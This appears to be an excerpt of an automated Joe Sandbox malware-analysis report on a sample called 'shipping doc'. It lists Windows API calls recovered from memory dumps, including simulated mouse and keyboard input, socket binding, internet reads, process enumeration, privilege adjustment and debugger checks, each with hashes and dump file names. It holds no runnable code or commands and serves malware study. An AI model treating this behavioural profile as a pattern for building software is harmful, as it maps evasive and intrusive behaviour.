                                                                                                • Part of subcall function 0015E4EC: GetWindowRect.USER32(?,?), ref: 0015E504
                                                                                              • GetDesktopWindow.USER32 ref: 00162312
                                                                                              • GetWindowRect.USER32(00000000), ref: 00162319
                                                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00162355
                                                                                              • GetCursorPos.USER32(?), ref: 00162381
                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001623DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                              • String ID:
                                                                                              • API String ID: 2387181109-0
                                                                                              • Opcode ID: 9d3add9611e90a82e2b9e8cdff953315ac232d27750653c7559c1bd7d5eee5f8
                                                                                              • Instruction ID: f1264f6d746be0e7afefb8adf913891cb09310144bf92d9f8e067cbcf2088abb
                                                                                              • Opcode Fuzzy Hash: 9d3add9611e90a82e2b9e8cdff953315ac232d27750653c7559c1bd7d5eee5f8
                                                                                              • Instruction Fuzzy Hash: B031BC72505715ABC720DF54CC49AABBBA9FB88314F000A1DF98997291DB34EA58CBD2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00159B78
                                                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00159C8B
                                                                                                • Part of subcall function 00153874: GetInputState.USER32 ref: 001538CB
                                                                                                • Part of subcall function 00153874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00153966
                                                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00159BA8
                                                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00159C75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1972594611-438819550
                                                                                              • Opcode ID: d3f0f909f81413111efdfbc51bce9a35695a13560118be64c8be185d797d66c6
                                                                                              • Instruction ID: 3d6a954a8a18d499f19901ff30b99e8db8635bfdeaaa9c469c541fcb8e313b07
                                                                                              • Opcode Fuzzy Hash: d3f0f909f81413111efdfbc51bce9a35695a13560118be64c8be185d797d66c6
                                                                                              • Instruction Fuzzy Hash: FB415F7190420ADFDF14DF64C989AEEBBB8EF05311F244159E819B7191EB309E88CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000F9BB2
                                                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 000F9A4E
                                                                                              • GetSysColor.USER32(0000000F), ref: 000F9B23
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 000F9B36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$LongProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3131106179-0
                                                                                              • Opcode ID: d6a4bbe7ddf55ac3ea5471907d2afd57e5cade05ad01493a34a3585dcf70c845
                                                                                              • Instruction ID: 32c234d07f22396fb86508d4ccf085b45c2475bc134daa433317dd54a33604cb
                                                                                              • Opcode Fuzzy Hash: d6a4bbe7ddf55ac3ea5471907d2afd57e5cade05ad01493a34a3585dcf70c845
                                                                                              • Instruction Fuzzy Hash: D3A1FBB0108448BEE739AA3D8C9DF7F369DEB82340F15420AF612D6DD1CB259D45E2B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0016304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0016307A
                                                                                                • Part of subcall function 0016304E: _wcslen.LIBCMT ref: 0016309B
                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0016185D
                                                                                              • WSAGetLastError.WSOCK32 ref: 00161884
                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 001618DB
                                                                                              • WSAGetLastError.WSOCK32 ref: 001618E6
                                                                                              • closesocket.WSOCK32(00000000), ref: 00161915
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 1601658205-0
                                                                                              • Opcode ID: 0e4fa66bf06d1d3fd7f96f880f45d0927ca7ddef3325fba4f6f8bc6beca34069
                                                                                              • Instruction ID: 125e658ac557d86fe3c0df6ac217fedacae3e82b6aaeda8d8692b42c39a45e80
                                                                                              • Opcode Fuzzy Hash: 0e4fa66bf06d1d3fd7f96f880f45d0927ca7ddef3325fba4f6f8bc6beca34069
                                                                                              • Instruction Fuzzy Hash: 1951A371A00210AFEB10AF24D886F6A77E5AB44718F58845CF91AAF3D3D771AD41CBE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                              • String ID:
                                                                                              • API String ID: 292994002-0
                                                                                              • Opcode ID: 0c55c5598365fac7d3a2d5b1e9d2866b97e535903f8f86207fd409e93ba6229f
                                                                                              • Instruction ID: c53fa328f9d91f067cd054d033afb18f99071e5f1aead8d7cd4f04849c95f119
                                                                                              • Opcode Fuzzy Hash: 0c55c5598365fac7d3a2d5b1e9d2866b97e535903f8f86207fd409e93ba6229f
                                                                                              • Instruction Fuzzy Hash: 522191317402516FD7218F5ED884B6A7BB5AF95325B19C06CE84E8B352CB71DC82CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                              • API String ID: 0-1546025612
                                                                                              • Opcode ID: 81059bde0196c53f27c7d0381dce95b07566ea14f013fee45936587ba72a8249
                                                                                              • Instruction ID: 442d69def1180b4f88cb98d55f56cae3a7388feeb57d9ef49e7433412fe2bcc4
                                                                                              • Opcode Fuzzy Hash: 81059bde0196c53f27c7d0381dce95b07566ea14f013fee45936587ba72a8249
                                                                                              • Instruction Fuzzy Hash: A6A28F71A0066ACFDF34CF59D8807ADB7B2BF54310F2481AAE859B7285EB309D91CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0016A6AC
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0016A6BA
                                                                                                • Part of subcall function 000E9CB3: _wcslen.LIBCMT ref: 000E9CBD
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0016A79C
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0016A7AB
                                                                                                • Part of subcall function 000FCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00123303,?), ref: 000FCE8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 1991900642-0
                                                                                              • Opcode ID: d9db8e22d1f5da00506111f28c800f213d5f5fbfa99592b0288407defddbc45f
                                                                                              • Instruction ID: 6d9568bee84b96d8e806b76b1fe103f1965e8667a9b8fb6769efc06086abedaf
                                                                                              • Opcode Fuzzy Hash: d9db8e22d1f5da00506111f28c800f213d5f5fbfa99592b0288407defddbc45f
                                                                                              • Instruction Fuzzy Hash: EE517F715083419FD310EF25C886EABBBE8FF89754F40492DF589A7252EB31D944CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0014AAAC
                                                                                              • SetKeyboardState.USER32(00000080), ref: 0014AAC8
                                                                                              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0014AB36
                                                                                              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0014AB88
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                              • String ID:
                                                                                              • API String ID: 432972143-0
                                                                                              • Opcode ID: 411c228790ac5625a5a78569c4ca2e6f21632a750ab82bdeb989d98c85107437
                                                                                              • Instruction ID: 189376d46ef07e2f07615d4d437d025f2e9faefcdec88e6fe0b128fa2b14d93b
                                                                                              • Opcode Fuzzy Hash: 411c228790ac5625a5a78569c4ca2e6f21632a750ab82bdeb989d98c85107437
                                                                                              • Instruction Fuzzy Hash: 35311270AC0208AEFB35CB648C05BFA7BAAEF54320F85421AF585961F0D3759981C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0011BB7F
                                                                                                • Part of subcall function 001129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000), ref: 001129DE
                                                                                                • Part of subcall function 001129C8: GetLastError.KERNEL32(00000000,?,0011D7D1,00000000,00000000,00000000,00000000,?,0011D7F8,00000000,00000007,00000000,?,0011DBF5,00000000,00000000), ref: 001129F0
                                                                                              • GetTimeZoneInformation.KERNEL32 ref: 0011BB91
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,001B121C,000000FF,?,0000003F,?,?), ref: 0011BC09
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,001B1270,000000FF,?,0000003F,?,?,?,001B121C,000000FF,?,0000003F,?,?), ref: 0011BC36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                              • String ID:
                                                                                              • API String ID: 806657224-0
                                                                                              • Opcode ID: b25da9e45aec8407a65afdb0b46bb68ba14bf837592205416782e22448cd7bad
                                                                                              • Instruction ID: 0d10f0eb67971d71a1231a89737b101593724a4a2e9dca933bed5310a0eb97fd
                                                                                              • Opcode Fuzzy Hash: b25da9e45aec8407a65afdb0b46bb68ba14bf837592205416782e22448cd7bad
                                                                                              • Instruction Fuzzy Hash: 7631AE70908205EFCB19DF69DCD09A9BBB8BF55310B6542BAE064DB6A1D7309ED0CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 0015CE89
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0015CEEA
                                                                                              • SetEvent.KERNEL32(?,?,00000000), ref: 0015CEFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorEventFileInternetLastRead
                                                                                              • String ID:
                                                                                              • API String ID: 234945975-0
                                                                                              • Opcode ID: 169cb632c2b459779bb47469dc79e37166806aac6023395131fcdef4f3523710
                                                                                              • Instruction ID: 2ef8e7d92c75e7aa00502ea58c962afa028ee43a562d4b1577f76360a22533af
                                                                                              • Opcode Fuzzy Hash: 169cb632c2b459779bb47469dc79e37166806aac6023395131fcdef4f3523710
                                                                                              • Instruction Fuzzy Hash: 1821BD71500305DFE720CFA5C949BA67BF8EB50315F10481EE956E6151E770EE888BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001482AA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen
                                                                                              • String ID: ($|
                                                                                              • API String ID: 1659193697-1631851259
                                                                                              • Opcode ID: afa1fa17ada542de0115f1ad7cc5ef4076205c2b3e4e606ba850ac2a69626b16
                                                                                              • Instruction ID: ce142a90fd768a34703ecb8c6cd255fbecf2314a2bc4c55c891201691a73e1f8
                                                                                              • Opcode Fuzzy Hash: afa1fa17ada542de0115f1ad7cc5ef4076205c2b3e4e606ba850ac2a69626b16
                                                                                              • Instruction Fuzzy Hash: 2F322575A006059FCB28CF59C481AAAB7F0FF48710B15C56EE59ADB7A1EB70E981CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00155CC1
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00155D17
                                                                                              • FindClose.KERNEL32(?), ref: 00155D5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 3541575487-0
                                                                                              • Opcode ID: 308677e29b45df63cc1bdcfbeaa88b8996a9fcd62c9c406998bd50729e6676df
                                                                                              • Instruction ID: fb13fcde29e6bd1620b6e8a9bd5f89c7ac65720bfc1d74e478283ef4ad5f2a7a
                                                                                              • Opcode Fuzzy Hash: 308677e29b45df63cc1bdcfbeaa88b8996a9fcd62c9c406998bd50729e6676df
                                                                                              • Instruction Fuzzy Hash: 82519835604A01DFC714CF68C4A4E9AB7F5FF49314F14855EE9AA8B3A2CB31E948CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0011271A
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00112724
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00112731
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: c9ba1b55d0e2646bd35191bda502768e476a4cf06afc72e40386bb72f836a447
                                                                                              • Instruction ID: b38d294c9db5acbd1dc7df37ae056916a229e0be9032600ff1a52915025059cd
                                                                                              • Opcode Fuzzy Hash: c9ba1b55d0e2646bd35191bda502768e476a4cf06afc72e40386bb72f836a447
                                                                                              • Instruction Fuzzy Hash: 9131C4749012289BCB25DF68DC887D9B7B8BF18310F5041EAE80CA72A1EB709FC18F45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 001551DA
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00155238
                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 001552A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DiskFreeSpace
                                                                                              • String ID:
                                                                                              • API String ID: 1682464887-0
                                                                                              • Opcode ID: 357a84dbe8c27b0fa73b5bab63a749968ce91337acc184fa6835d399cbb2fa7b
                                                                                              • Instruction ID: b05b516955d8f9dc1e520486880f1d2d857597450391f84c515b15023ea66b12
                                                                                              • Opcode Fuzzy Hash: 357a84dbe8c27b0fa73b5bab63a749968ce91337acc184fa6835d399cbb2fa7b
                                                                                              • Instruction Fuzzy Hash: BD314C75A00518DFDB00DF54D894EADBBB5FF49314F4480A9E809AB362DB31E89ACB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 000FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00100668
                                                                                                • Part of subcall function 000FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00100685
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0014170D
                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0014173A
                                                                                              • GetLastError.KERNEL32 ref: 0014174A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780872168.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780917767.00000000001AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1780934156.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e0000_shipping doc.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                              • String ID:
                                                                                              • API String ID: 577356006-0
                                                                                              • Opcode ID: 3371a57588cb5e5c1cd3f9bbd129cee36019103ad0825c8ba5e732c3106b84ea
                                                                                              • Instruction ID: 3ed1b1b15a023aca4636663c35460497d0c4ede37abacc6a8005a2d547f126af
                                                                                              • Opcode Fuzzy Hash: 3371a57588cb5e5c1cd3f9bbd129cee36019103ad0825c8ba5e732c3106b84ea
                                                                                              • Instruction Fuzzy Hash: B511BCB2400209BFE718AF54DC86DBBB7B9EF04714B20852EF05652651EB70BC818A60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0014D608
                                                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0014D645
                                                                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0014D650
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1780823554.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1780807534.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
